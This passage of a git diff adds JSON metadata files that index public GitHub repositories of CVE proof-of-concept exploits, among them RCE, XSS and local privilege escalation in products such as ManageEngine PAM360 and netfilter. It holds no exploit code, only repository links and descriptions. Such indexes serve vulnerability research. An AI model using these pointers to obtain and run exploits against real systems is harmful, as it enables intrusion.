"2023-01-31T22:07:50Z", + "updated_at": "2024-07-02T20:34:40Z", + "pushed_at": "2023-01-31T22:31:39Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-3464.json b/2022/CVE-2022-3464.json new file mode 100644 index 0000000000..2bafc2b4bf --- /dev/null +++ b/2022/CVE-2022-3464.json @@ -0,0 +1,33 @@ +[ + { + "id": 583195681, + "name": "CVE-2022-3464", + "full_name": "GYLQ\/CVE-2022-3464", + "owner": { + "login": "GYLQ", + "id": 15842234, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/15842234?v=4", + "html_url": "https:\/\/github.com\/GYLQ", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/GYLQ\/CVE-2022-3464", + "description": "A vulnerability classified as problematic has been found in puppyCMS up to 5.1. This affects an unknown part of the file \/admin\/settings.php. The manipulation of the argument site_name leads to cross site scripting. It is possible to initiate the attack remotely. The associated identifier of this vulnerability is VDB-2 CVE project by @Sn0wAlice", + "fork": false, + "created_at": "2022-12-29T03:39:33Z", + "updated_at": "2023-02-20T13:51:18Z", + "pushed_at": "2022-12-29T03:38:57Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-34683.json b/2022/CVE-2022-34683.json new file mode 100644 index 0000000000..99b5f2e46c --- /dev/null +++ b/2022/CVE-2022-34683.json @@ -0,0 +1,33 @@ +[ + { + "id": 588700609, + "name": "CVE-2022-34683", + "full_name": "gmh5225\/CVE-2022-34683", + "owner": { + "login": "gmh5225", + "id": 13917777, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13917777?v=4", + "html_url": "https:\/\/github.com\/gmh5225", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gmh5225\/CVE-2022-34683", + "description": "NVIDIA GPU Display Driver for Windows contains a vulnerability in the kernel mode layer (nvlddmkm.sys) handler for DxgkDdiEscape, where a null-pointer dereference occurs, which may lead to denial of service. CVE project by @Sn0wAlice", + "fork": false, + "created_at": "2023-01-13T19:18:02Z", + "updated_at": "2023-02-20T15:21:34Z", + "pushed_at": "2023-01-06T23:41:35Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-34715.json b/2022/CVE-2022-34715.json new file mode 100644 index 0000000000..1c21f0e8a4 --- /dev/null +++ b/2022/CVE-2022-34715.json @@ -0,0 +1,33 @@ +[ + { + "id": 536031760, + "name": "CVE-2022-34715-POC", + "full_name": "Starssgo\/CVE-2022-34715-POC", + "owner": { + "login": "Starssgo", + "id": 50407469, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50407469?v=4", + "html_url": "https:\/\/github.com\/Starssgo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Starssgo\/CVE-2022-34715-POC", + "description": "CVE-2022-34715-POC pcap", + "fork": false, + "created_at": "2022-09-13T08:33:03Z", + "updated_at": "2023-11-05T06:49:45Z", + "pushed_at": "2022-09-13T08:39:36Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 5, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-34718.json b/2022/CVE-2022-34718.json new file mode 100644 index 0000000000..8e67764116 --- /dev/null +++ b/2022/CVE-2022-34718.json @@ -0,0 +1,33 @@ +[ + { + "id": 544874385, + "name": "CVE-2022-34718-PoC", + "full_name": "SecLabResearchBV\/CVE-2022-34718-PoC", + "owner": { + "login": "SecLabResearchBV", + "id": 114392470, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/114392470?v=4", + "html_url": "https:\/\/github.com\/SecLabResearchBV", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SecLabResearchBV\/CVE-2022-34718-PoC", + "description": null, + "fork": false, + "created_at": "2022-10-03T11:39:25Z", + "updated_at": "2024-06-27T12:01:56Z", + "pushed_at": "2022-10-10T08:57:29Z", + "stargazers_count": 47, + "watchers_count": 47, + "has_discussions": false, + "forks_count": 16, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 16, + "watchers": 47, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-34753.json b/2022/CVE-2022-34753.json new file mode 100644 index 0000000000..f67461e00e --- /dev/null +++ b/2022/CVE-2022-34753.json @@ -0,0 +1,37 @@ +[ + { + "id": 695311817, + "name": "CVE-2022-34753-EXPLOIT", + "full_name": "K3ysTr0K3R\/CVE-2022-34753-EXPLOIT", + "owner": { + "login": "K3ysTr0K3R", + "id": 70909693, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70909693?v=4", + "html_url": "https:\/\/github.com\/K3ysTr0K3R", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/K3ysTr0K3R\/CVE-2022-34753-EXPLOIT", + "description": "A PoC exploit for CVE-2022-34753 - OS Command Injection in SpaceLogic C-Bus Home Controller", + "fork": false, + "created_at": "2023-09-22T20:41:19Z", + "updated_at": "2024-08-03T02:03:40Z", + "pushed_at": "2023-09-22T20:58:54Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "exploit", + "exploitation", + "hacking" + ], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-34913.json b/2022/CVE-2022-34913.json new file mode 100644 index 0000000000..a0ea615994 --- /dev/null +++ b/2022/CVE-2022-34913.json @@ -0,0 +1,33 @@ +[ + { + "id": 595832872, + "name": "CVE-2022-34913", + "full_name": "Halcy0nic\/CVE-2022-34913", + "owner": { + "login": "Halcy0nic", + "id": 42481692, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42481692?v=4", + "html_url": "https:\/\/github.com\/Halcy0nic", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Halcy0nic\/CVE-2022-34913", + "description": "Proof of concept for CVE-2022-34913", + "fork": false, + "created_at": "2023-01-31T22:37:29Z", + "updated_at": "2024-07-02T20:34:32Z", + "pushed_at": "2023-01-31T23:00:35Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-34918.json b/2022/CVE-2022-34918.json new file mode 100644 index 0000000000..c47c466ae7 --- /dev/null +++ b/2022/CVE-2022-34918.json @@ -0,0 +1,157 @@ +[ + { + "id": 515581938, + "name": "CVE-2022-34918-LPE-PoC", + "full_name": "randorisec\/CVE-2022-34918-LPE-PoC", + "owner": { + "login": "randorisec", + "id": 23558951, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/23558951?v=4", + "html_url": "https:\/\/github.com\/randorisec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/randorisec\/CVE-2022-34918-LPE-PoC", + "description": null, + "fork": false, + "created_at": "2022-07-19T12:46:45Z", + "updated_at": "2024-11-06T09:16:42Z", + "pushed_at": "2022-09-06T14:05:22Z", + "stargazers_count": 243, + "watchers_count": 243, + "has_discussions": false, + "forks_count": 35, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 35, + "watchers": 243, + "score": 0, + "subscribers_count": 12 + }, + { + "id": 517351313, + "name": "CVE-2022-34918-LPE-PoC", + "full_name": "merlinepedra25\/CVE-2022-34918-LPE-PoC", + "owner": { + "login": "merlinepedra25", + "id": 69723528, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/69723528?v=4", + "html_url": "https:\/\/github.com\/merlinepedra25", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/merlinepedra25\/CVE-2022-34918-LPE-PoC", + "description": null, + "fork": false, + "created_at": "2022-07-24T14:47:40Z", + "updated_at": "2024-10-02T17:30:07Z", + "pushed_at": "2022-07-24T14:47:49Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 517351368, + "name": "CVE-2022-34918-LPE-PoC", + "full_name": "merlinepedra\/CVE-2022-34918-LPE-PoC", + "owner": { + "login": "merlinepedra", + "id": 3269069, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3269069?v=4", + "html_url": "https:\/\/github.com\/merlinepedra", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/merlinepedra\/CVE-2022-34918-LPE-PoC", + "description": null, + "fork": false, + "created_at": "2022-07-24T14:47:55Z", + "updated_at": "2022-07-26T01:51:26Z", + "pushed_at": "2022-07-24T14:48:03Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 517540560, + "name": "CVE-2022-34918", + "full_name": "linulinu\/CVE-2022-34918", + "owner": { + "login": "linulinu", + "id": 98687363, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/98687363?v=4", + "html_url": "https:\/\/github.com\/linulinu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/linulinu\/CVE-2022-34918", + "description": null, + "fork": false, + "created_at": "2022-07-25T06:13:41Z", + "updated_at": "2022-07-25T06:15:05Z", + "pushed_at": "2022-07-25T06:20:50Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 520440526, + "name": "CVE-2022-34918", + "full_name": "veritas501\/CVE-2022-34918", + "owner": { + "login": "veritas501", + "id": 25763545, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25763545?v=4", + "html_url": "https:\/\/github.com\/veritas501", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/veritas501\/CVE-2022-34918", + "description": "CVE-2022-34918 netfilter nf_tables 本地提权 POC", + "fork": false, + "created_at": "2022-08-02T09:52:02Z", + "updated_at": "2024-08-12T20:25:48Z", + "pushed_at": "2022-09-15T03:19:28Z", + "stargazers_count": 215, + "watchers_count": 215, + "has_discussions": false, + "forks_count": 43, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 43, + "watchers": 215, + "score": 0, + "subscribers_count": 8 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-34919.json b/2022/CVE-2022-34919.json new file mode 100644 index 0000000000..3e0a437d76 --- /dev/null +++ b/2022/CVE-2022-34919.json @@ -0,0 +1,33 @@ +[ + { + "id": 525463179, + "name": "CVE-2022-34919", + "full_name": "ahajnik\/CVE-2022-34919", + "owner": { + "login": "ahajnik", + "id": 63816088, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63816088?v=4", + "html_url": "https:\/\/github.com\/ahajnik", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ahajnik\/CVE-2022-34919", + "description": null, + "fork": false, + "created_at": "2022-08-16T16:39:17Z", + "updated_at": "2022-08-22T13:12:26Z", + "pushed_at": "2022-08-16T17:36:39Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-34961.json b/2022/CVE-2022-34961.json new file mode 100644 index 0000000000..684caa328b --- /dev/null +++ b/2022/CVE-2022-34961.json @@ -0,0 +1,33 @@ +[ + { + "id": 508303833, + "name": "CVE-2022-34961", + "full_name": "bypazs\/CVE-2022-34961", + "owner": { + "login": "bypazs", + "id": 5837953, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5837953?v=4", + "html_url": "https:\/\/github.com\/bypazs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bypazs\/CVE-2022-34961", + "description": "OpenTeknik LLC OSSN OPEN SOURCE SOCIAL NETWORK v6.3 LTS was discovered to contain a stored cross-site scripting (XSS) vulnerability via the Users Timeline module.", + "fork": false, + "created_at": "2022-06-28T13:08:40Z", + "updated_at": "2024-08-12T20:24:34Z", + "pushed_at": "2022-07-08T04:49:03Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-34962.json b/2022/CVE-2022-34962.json new file mode 100644 index 0000000000..7da8ed3a8c --- /dev/null +++ b/2022/CVE-2022-34962.json @@ -0,0 +1,33 @@ +[ + { + "id": 508307477, + "name": "CVE-2022-34962", + "full_name": "bypazs\/CVE-2022-34962", + "owner": { + "login": "bypazs", + "id": 5837953, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5837953?v=4", + "html_url": "https:\/\/github.com\/bypazs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bypazs\/CVE-2022-34962", + "description": "OpenTeknik LLC OSSN OPEN SOURCE SOCIAL NETWORK v6.3 LTS was discovered to contain a stored cross-site scripting (XSS) vulnerability via the Group Timeline module.", + "fork": false, + "created_at": "2022-06-28T13:18:56Z", + "updated_at": "2022-07-08T04:52:16Z", + "pushed_at": "2022-07-08T05:59:58Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-34963.json b/2022/CVE-2022-34963.json new file mode 100644 index 0000000000..46069086fc --- /dev/null +++ b/2022/CVE-2022-34963.json @@ -0,0 +1,33 @@ +[ + { + "id": 508272003, + "name": "CVE-2022-34963", + "full_name": "bypazs\/CVE-2022-34963", + "owner": { + "login": "bypazs", + "id": 5837953, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5837953?v=4", + "html_url": "https:\/\/github.com\/bypazs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bypazs\/CVE-2022-34963", + "description": "OpenTeknik LLC OSSN OPEN SOURCE SOCIAL NETWORK v6.3 LTS was discovered to contain a stored cross-site scripting (XSS) vulnerability via the News Feed module.", + "fork": false, + "created_at": "2022-06-28T11:32:28Z", + "updated_at": "2022-10-02T14:02:34Z", + "pushed_at": "2022-07-08T06:00:06Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-34970.json b/2022/CVE-2022-34970.json new file mode 100644 index 0000000000..77377bae54 --- /dev/null +++ b/2022/CVE-2022-34970.json @@ -0,0 +1,33 @@ +[ + { + "id": 519029849, + "name": "CVE-2022-34970", + "full_name": "0xhebi\/CVE-2022-34970", + "owner": { + "login": "0xhebi", + "id": 21058883, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21058883?v=4", + "html_url": "https:\/\/github.com\/0xhebi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xhebi\/CVE-2022-34970", + "description": "Vulnerability in Crow prior v1.0+4", + "fork": false, + "created_at": "2022-07-29T00:19:33Z", + "updated_at": "2022-08-11T03:07:18Z", + "pushed_at": "2022-08-10T23:14:25Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-35131.json b/2022/CVE-2022-35131.json new file mode 100644 index 0000000000..605893aa95 --- /dev/null +++ b/2022/CVE-2022-35131.json @@ -0,0 +1,33 @@ +[ + { + "id": 517543911, + "name": "Joplin-CVE-2022-35131", + "full_name": "ly1g3\/Joplin-CVE-2022-35131", + "owner": { + "login": "ly1g3", + "id": 105918602, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/105918602?v=4", + "html_url": "https:\/\/github.com\/ly1g3", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ly1g3\/Joplin-CVE-2022-35131", + "description": "Joplin CVE-2022-35131, RCE", + "fork": false, + "created_at": "2022-07-25T06:25:52Z", + "updated_at": "2022-07-26T14:20:45Z", + "pushed_at": "2022-07-25T06:31:59Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-3518.json b/2022/CVE-2022-3518.json new file mode 100644 index 0000000000..28f15f4829 --- /dev/null +++ b/2022/CVE-2022-3518.json @@ -0,0 +1,33 @@ +[ + { + "id": 560380307, + "name": "CVE-2022-3518", + "full_name": "lohith19\/CVE-2022-3518", + "owner": { + "login": "lohith19", + "id": 30563726, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30563726?v=4", + "html_url": "https:\/\/github.com\/lohith19", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lohith19\/CVE-2022-3518", + "description": null, + "fork": false, + "created_at": "2022-11-01T11:22:21Z", + "updated_at": "2022-11-02T01:04:35Z", + "pushed_at": "2022-11-01T11:23:11Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-35405.json b/2022/CVE-2022-35405.json new file mode 100644 index 0000000000..86ed5ef5d9 --- /dev/null +++ b/2022/CVE-2022-35405.json @@ -0,0 +1,40 @@ +[ + { + "id": 515337808, + "name": "CVE-2022-35405", + "full_name": "viniciuspereiras\/CVE-2022-35405", + "owner": { + "login": "viniciuspereiras", + "id": 69733777, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/69733777?v=4", + "html_url": "https:\/\/github.com\/viniciuspereiras", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/viniciuspereiras\/CVE-2022-35405", + "description": "ManageEngine PAM360, Password Manager Pro, and Access Manager Plus unauthenticated remote code execution vulnerability PoC-exploit", + "fork": false, + "created_at": "2022-07-18T20:52:01Z", + "updated_at": "2024-11-18T01:54:52Z", + "pushed_at": "2022-09-27T14:52:32Z", + "stargazers_count": 29, + "watchers_count": 29, + "has_discussions": false, + "forks_count": 11, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-35405", + "exploit", + "java", + "poc", + "rce", + "vulnerability" + ], + "visibility": "public", + "forks": 11, + "watchers": 29, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-35411.json b/2022/CVE-2022-35411.json new file mode 100644 index 0000000000..3b78037d19 --- /dev/null +++ b/2022/CVE-2022-35411.json @@ -0,0 +1,33 @@ +[ + { + "id": 786312081, + "name": "CVE-2022-35411", + "full_name": "fuzzlove\/CVE-2022-35411", + "owner": { + "login": "fuzzlove", + "id": 44779781, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44779781?v=4", + "html_url": "https:\/\/github.com\/fuzzlove", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fuzzlove\/CVE-2022-35411", + "description": "rpc.py 0.6.0 - Remote Code Execution (RCE)", + "fork": false, + "created_at": "2024-04-14T04:08:44Z", + "updated_at": "2024-10-15T02:54:38Z", + "pushed_at": "2024-04-25T09:14:46Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-35416.json b/2022/CVE-2022-35416.json new file mode 100644 index 0000000000..5361ce2334 --- /dev/null +++ b/2022/CVE-2022-35416.json @@ -0,0 +1,33 @@ +[ + { + "id": 512999548, + "name": "CVE-2022-35416", + "full_name": "safe3s\/CVE-2022-35416", + "owner": { + "login": "safe3s", + "id": 108328094, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/108328094?v=4", + "html_url": "https:\/\/github.com\/safe3s", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/safe3s\/CVE-2022-35416", + "description": "H3C_SSL_VPN_XSS(Reflected XSS) CVE-2022-35416", + "fork": false, + "created_at": "2022-07-12T04:35:49Z", + "updated_at": "2024-03-06T12:47:23Z", + "pushed_at": "2022-07-12T04:38:50Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-3546.json b/2022/CVE-2022-3546.json new file mode 100644 index 0000000000..dedb9d1d90 --- /dev/null +++ b/2022/CVE-2022-3546.json @@ -0,0 +1,33 @@ +[ + { + "id": 552325321, + "name": "CVE-2022-3546", + "full_name": "thehackingverse\/CVE-2022-3546", + "owner": { + "login": "thehackingverse", + "id": 86924237, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/86924237?v=4", + "html_url": "https:\/\/github.com\/thehackingverse", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/thehackingverse\/CVE-2022-3546", + "description": null, + "fork": false, + "created_at": "2022-10-16T10:35:24Z", + "updated_at": "2022-11-20T07:45:32Z", + "pushed_at": "2023-05-10T06:11:46Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-35500.json b/2022/CVE-2022-35500.json new file mode 100644 index 0000000000..c3fc131662 --- /dev/null +++ b/2022/CVE-2022-35500.json @@ -0,0 +1,33 @@ +[ + { + "id": 556807932, + "name": "CVE-2022-35500", + "full_name": "afine-com\/CVE-2022-35500", + "owner": { + "login": "afine-com", + "id": 105647610, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/105647610?v=4", + "html_url": "https:\/\/github.com\/afine-com", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/afine-com\/CVE-2022-35500", + "description": "Stored Cross-site Scripting (XSS) in leave comment functionality in Amasty Blog Pro for Magento 2", + "fork": false, + "created_at": "2022-10-24T14:52:41Z", + "updated_at": "2022-10-25T00:47:08Z", + "pushed_at": "2022-10-24T15:21:13Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-35501.json b/2022/CVE-2022-35501.json new file mode 100644 index 0000000000..e04e6618bf --- /dev/null +++ b/2022/CVE-2022-35501.json @@ -0,0 +1,33 @@ +[ + { + "id": 556812883, + "name": "CVE-2022-35501", + "full_name": "afine-com\/CVE-2022-35501", + "owner": { + "login": "afine-com", + "id": 105647610, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/105647610?v=4", + "html_url": "https:\/\/github.com\/afine-com", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/afine-com\/CVE-2022-35501", + "description": "Stored Cross-site Scripting (XSS) in blog-post creation functionality in Amasty Blog Pro for Magento 2", + "fork": false, + "created_at": "2022-10-24T15:02:43Z", + "updated_at": "2022-10-25T00:47:07Z", + "pushed_at": "2022-10-24T15:16:47Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-35513.json b/2022/CVE-2022-35513.json new file mode 100644 index 0000000000..cf68887f6c --- /dev/null +++ b/2022/CVE-2022-35513.json @@ -0,0 +1,39 @@ +[ + { + "id": 510851949, + "name": "CVE-2022-35513", + "full_name": "p1ckzi\/CVE-2022-35513", + "owner": { + "login": "p1ckzi", + "id": 44880203, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44880203?v=4", + "html_url": "https:\/\/github.com\/p1ckzi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/p1ckzi\/CVE-2022-35513", + "description": "CVE-2022-35513 | blink1-pass-decrypt", + "fork": false, + "created_at": "2022-07-05T18:27:36Z", + "updated_at": "2022-08-15T02:28:51Z", + "pushed_at": "2022-08-15T08:12:53Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "blink1-pass-decrypt", + "blink1control2", + "cve", + "cve-2022-35513", + "exploit" + ], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-3552.json b/2022/CVE-2022-3552.json new file mode 100644 index 0000000000..c5bfb745c4 --- /dev/null +++ b/2022/CVE-2022-3552.json @@ -0,0 +1,33 @@ +[ + { + "id": 622192084, + "name": "CVE-2022-3552", + "full_name": "kabir0x23\/CVE-2022-3552", + "owner": { + "login": "kabir0x23", + "id": 44284877, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44284877?v=4", + "html_url": "https:\/\/github.com\/kabir0x23", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kabir0x23\/CVE-2022-3552", + "description": "BoxBilling<=4.22.1.5 - Remote Code Execution (RCE)", + "fork": false, + "created_at": "2023-04-01T11:53:14Z", + "updated_at": "2023-12-05T02:10:47Z", + "pushed_at": "2023-04-01T15:45:53Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-3564.json b/2022/CVE-2022-3564.json new file mode 100644 index 0000000000..f266804024 --- /dev/null +++ b/2022/CVE-2022-3564.json @@ -0,0 +1,33 @@ +[ + { + "id": 691480377, + "name": "linux-4.1.15_CVE-2022-3564", + "full_name": "Trinadh465\/linux-4.1.15_CVE-2022-3564", + "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/linux-4.1.15_CVE-2022-3564", + "description": null, + "fork": false, + "created_at": "2023-09-14T09:07:11Z", + "updated_at": "2023-09-14T09:22:05Z", + "pushed_at": "2023-09-14T14:58:57Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-35649.json b/2022/CVE-2022-35649.json new file mode 100644 index 0000000000..20ccaadeb0 --- /dev/null +++ b/2022/CVE-2022-35649.json @@ -0,0 +1,33 @@ +[ + { + "id": 610209003, + "name": "CVE-2022-35649", + "full_name": "antoinenguyen-09\/CVE-2022-35649", + "owner": { + "login": 